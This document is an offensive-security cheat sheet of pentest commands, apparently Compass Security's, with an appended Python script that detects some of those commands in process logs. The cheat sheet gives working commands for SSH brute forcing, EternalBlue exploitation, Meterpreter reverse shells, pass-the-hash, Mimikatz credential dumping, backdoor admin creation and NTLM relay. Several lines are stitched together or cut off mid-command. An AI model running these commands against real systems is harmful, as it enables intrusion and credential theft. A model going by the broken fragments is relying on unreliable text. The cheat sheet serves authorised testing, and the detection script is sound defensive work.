Hacking Tools Cheat Sheet
Compass Security, Version 1.1, January 2020
https://www.compass-security.com

Basic Linux Networking Tools

Show IP configuration:
# ip a l

Change IP/MAC address:
# ip link set dev eth0 down
# macchanger -m 23:05:13:37:42:21 eth0
# ip link set dev eth0 up

Static IP address configuration:
# ip addr add 10.5.23.42/24 dev eth0

DNS lookup:
# dig compass-security.com

Reverse DNS lookup:
# dig -x 10.5.23.42

Show ARP cache:
# ip neigh

Delete ARP cache:
# ip neigh flush all

-subj "/CN=example.org/"

Start TLS server:
# ncat --ssl -l -p 1337 --ssl-cert cert.pem --ssl-key key.pem

Connect to TLS service:
# ncat --ssl 10.5.23.42 1337

Connect to TLS service using openssl:
# openssl s_client -connect 10.5.23.42:1337

Show certificate details:
# openssl s_client -connect 10.5.23.42:1337 | openssl x509 -text

Test TLS server certificate and ciphers:
# sslyze --regular 10.5.23.42:443

TCP to TLS proxy:
# socat TCP-LISTEN:2305,fork,reuseaddr ssl:example.com:443

Online TLS tests:
▪ ssllabs.com, hardenize.com

Sniff traffic:
# tcpdump [options] [filters]

Useful tcpdump options:
▪ -i interface: Interface or any for all
▪ -n: Disable name and port resolution
▪ -A: Print in ASCII
▪ -XX: Print in hex and ASCII
▪ -w file: Write output PCAP file
▪ -r file: Read PCAP file

Useful tcpdump filters:
▪ not arp: No ARP packets
▪ port ftp or port 23: Only port 21 or 23
▪ host 10.5.23.31: Only from/to host
▪ net 10.5.23.0/24: Only from/to hosts in network

Scan for vulnerabilities (script category filter):
# nmap -n -Pn --script "vuln and safe" 10.5.23.0/24

Performance Tuning (1 SYN packet ≈ 60 bytes → 20'000 packets/s ≈ 10 Mbps):
# nmap -n -Pn --min-rate 20000 10.5.23.0/24

Useful nmap options:
▪ -n: Disable name and port resolution
▪ -PR: ARP host discovery
▪ -Pn: Disable host discovery
▪ -sn: Disable port scan (host discovery only)
▪ -sS/-sT/-sU: SYN/TCP connect/UDP scan
▪ --top-ports 50: Scan 50 top ports
▪ -iL file: Host input file
▪ -oA file: Write output files (3 types)
▪ -sC: Script scan (default scripts)
▪ --script: Specific scripts
vuln-ms17-010 10.5.23.0/24

Vulnerability DBs and Exploits

Exploit search (local copy of the Exploit-DB):
# searchsploit apache

Show exploit file path and copy it into clipboard:
# searchsploit -p 40142

Online vulnerability and exploit databases:
▪ cvedetails.com, exploit-db.com, packetstormsecurity.com

Cracking

Try SSH passwords from a wordlist:
# ncrack -p 22 --user root -P ./passwords.txt 10.5.23.0/24

Determine hash type:
# hashid 869d[...]bd88

Show example hash types for hashcat:
# hashcat --example-hashes

Crack hashes (e.g. 5600 for NetNTLMv2 type):
# hashcat -m 5600 -a 0 hash.txt /path/to/wordlists/*

Crack hashes using John the Ripper:
# john hashes.txt

Metasploit Framework

Start Metasploit:
# msfconsole

Search exploit:
> search eternalblue

Use exploit:
msf > use exploit/windows/smb/ms17_…

Configure exploit:
msf exploit(…) > show options
msf exploit(…) > set TARGET 10.5.23.42

Run exploit:
msf exploit(…) > exploit

Generate reverse shell (WAR):
# msfvenom -p java/jsp_shell_reverse_tcp LHOST=

Upgrade to Meterpreter (or press ^Z (Ctrl-Z)):
> background
Background session 1? [y/N] y
> sessions # list sessions
> sessions -u 1 # Upgrade
> sessions 2 # interact with session 2
meterpreter > sysinfo # use it

Upload / download files:
meterpreter > upload pwn.exe
meterpreter > download c:\keepass.kdb

Execute a file:
meterpreter > execute -i -f /your/bin

Port forwarding to localhost:
meterpreter > portfwd add -l 2323 -p 3389 -r 10.5.23.23

Background Meterpreter session:
meterpreter > background

Pivoting through existing Meterpreter session:
> use post/multi/manage/autoroute
> set session 2 # meterpreter session
> run
> route

SOCKS via Meterpreter (requires autoroute):
> use auxiliary/server/socks4a
> set SRVPORT 8080
> run

Configure ProxyChains:
# vi /etc/proxychains.conf
[...]
socks4 127.0.0.1 1080

Connect through SOCKS proxy:
# proxychains ncat 172.23.5.42 1337

Meterpreter via pass-the-hash:
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 10.5.23.42 # attacker
msf > set LPORT 443
msf > set RHOST 10.5.23.21 # victim
msf > set SMBPass 01[...]03:01[...]03
msf > exploit
meterpreter > shell
C:\WINDOWS\system32>

Pass-the-Hash

Shell via pass-the-hash (Impacket Tools):
# ./psexec.py -hashes :011AD41795657A8ED80AB3FF6F078D03 domain/[email protected]

Over a subnet and extract SAM file:
# crackmapexec -u Administrator -H :011AD41795657A8ED80AB3FF6F078D03 10.5.23.0/24 --sam

Browse shares via pass-the-hash:
# ./smbclient.py domain/[email protected] -hashes

bypass ExecutionPolicy and execute Invoke-AllChecks. Use the abuse functions.

Add a new local admin:
C:\> net user backdoor P@ssw0rd23
C:\> net localgroup Administrators backdoor /add

Scan for network shares:
# smbmap.py --host-file smbhosts.txt -u Administrator -p PasswordOrHash

Windows Credentials Gathering

Start Mimikatz and create log file:
C:\>mimikatz.exe
# privilege::debug
# log C:\tmp\mimikatz.log

Read lsass.exe process dump:
# sekurlsa::minidump lsass.dmp
Dump lsass.exe in taskmgr or procdump.

Show passwords/hashes of logged in users:
# sekurlsa::logonpasswords

Backup SYSTEM & SAM hive:
C:\>reg save HKLM\SYSTEM system.hiv
C:\>reg save HKLM\SAM sam.hiv

Extract hashes using Mimikatz:
# lsadump::sam /system:system.hiv /sam:sam.hiv

NTLM Relay

Vulnerable if message_signing: disabled:
# nmap -n -Pn -p 445 --script smb-security-mode 10.5.23.0/24

Disable SMB and HTTP in Responder.conf and start Responder:
# ./Responder.py -I eth0

NTLM Relay to target and extract SAM file:
# ./ntlmrelayx.py -smb2support -t smb://10.5.23.42

NTLM Relay using socks proxy:
# ./ntlmrelayx.py -tf targets.txt -smb2support -socks

Configure ProxyChains:
# vi /etc/proxychains.conf
[...]
socks4 127.0.0.1 1080

Access files via SOCKS proxy:
# proxychains smbclient -m smb3 '\\10.5.23.42\C$' -W pc05 -U Administrator%invalidPwd

Active Directory

Use SharpHound to gather information and import into Bloodhound to analyze.
Download PingCastle from pingcastle.com and generate Report.

Linux Privilege Escalation

Enumerate local information (-t for more tests):
# curl -o /tmp/linenum https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
# bash /tmp/linenum -r /tmp/report
Other hardening checks can be done using lynis

More Online References
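The Windows sections above (local admin creation, SYSTEM/SAM hive export, Mimikatz credential dumping) are exactly the command lines a defender wants to catch in process-creation telemetry. The following detection script is an added example and is not part of the Compass Security cheat sheet; the log line format (ts/host/user/cmd fields) and the sample events are constructed for this example, and the rule names are made up here. It applies a small set of command-line rules to the events and groups the hits per host, so that a host showing account creation plus admin-group change plus hive export stands out as one chain rather than three isolated alerts.

```python
import re

# Constructed process-creation events in a simplified Sysmon-/4688-like
# key=value layout (made up for this example; not real telemetry).
SAMPLE_EVENTS = [
    'ts=2020-01-15T10:03:21Z host=PC05 user=bob cmd="net user backdoor P@ssw0rd23 /add"',
    'ts=2020-01-15T10:03:22Z host=PC05 user=bob cmd="net localgroup Administrators backdoor /add"',
    'ts=2020-01-15T10:07:05Z host=PC05 user=bob cmd="reg save HKLM\\SYSTEM system.hiv"',
    'ts=2020-01-15T10:07:06Z host=PC05 user=bob cmd="reg save HKLM\\SAM sam.hiv"',
    'ts=2020-01-15T10:09:40Z host=PC05 user=bob cmd="mimikatz.exe privilege::debug sekurlsa::logonpasswords"',
    'ts=2020-01-15T10:12:00Z host=PC07 user=alice cmd="net user alice /domain"',
    'ts=2020-01-15T10:13:10Z host=PC07 user=alice cmd="reg query HKLM\\SOFTWARE\\Microsoft"',
]

# Parser for the constructed event layout; cmd is the last, quoted field.
EVENT_RE = re.compile(
    r'ts=(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) cmd="(?P<cmd>.*)"'
)

# Detection rules: (rule name, compiled pattern). Names are this example's own.
# "net1" is the legacy alias of net.exe and is covered by the optional "1".
RULES = [
    ("local_account_created",
     re.compile(r"\bnet1?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("local_admin_added",
     re.compile(r"\bnet1?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
    ("credential_hive_exported",
     re.compile(r"\breg(?:\.exe)?\s+save\s+HKLM\\(?:SAM|SYSTEM|SECURITY)\b", re.I)),
    ("lsass_credential_dump",
     re.compile(r"sekurlsa::|lsadump::|procdump\S*\s+.*lsass", re.I)),
]


def parse_event(line):
    """Return the event fields as a dict, or None if the line does not match."""
    m = EVENT_RE.match(line)
    return m.groupdict() if m else None


def classify(cmd):
    """Return the names of all rules that match one command line."""
    return [name for name, rx in RULES if rx.search(cmd)]


def scan(lines):
    """Run every rule over every parsable event; one hit per (event, rule)."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue  # unparsable line: skip rather than crash the pipeline
        for tag in classify(ev["cmd"]):
            hits.append((ev["host"], ev["user"], tag, ev["cmd"]))
    return hits


def summarize(hits):
    """Group rule names per host so correlated activity on one host is visible."""
    by_host = {}
    for host, _user, tag, _cmd in hits:
        by_host.setdefault(host, set()).add(tag)
    return by_host


def backdoor_admin_hosts(hits):
    """Hosts where a local account was created AND added to Administrators."""
    by_host = summarize(hits)
    return sorted(h for h, tags in by_host.items()
                  if {"local_account_created", "local_admin_added"} <= tags)


if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for host, user, tag, cmd in found:
        print(f"{host} {user} {tag}: {cmd}")
    print("hosts with backdoor local admin chain:", backdoor_admin_hosts(found))
```

The rules are deliberately narrow (an exact `/add`, an exact hive name) so that routine `net user <name> /domain` or `reg query` usage, as in the PC07 sample lines, produces no hit; when tuning for a real environment, the grouping in `summarize` is what lets you raise severity for a host only when several of these appear together.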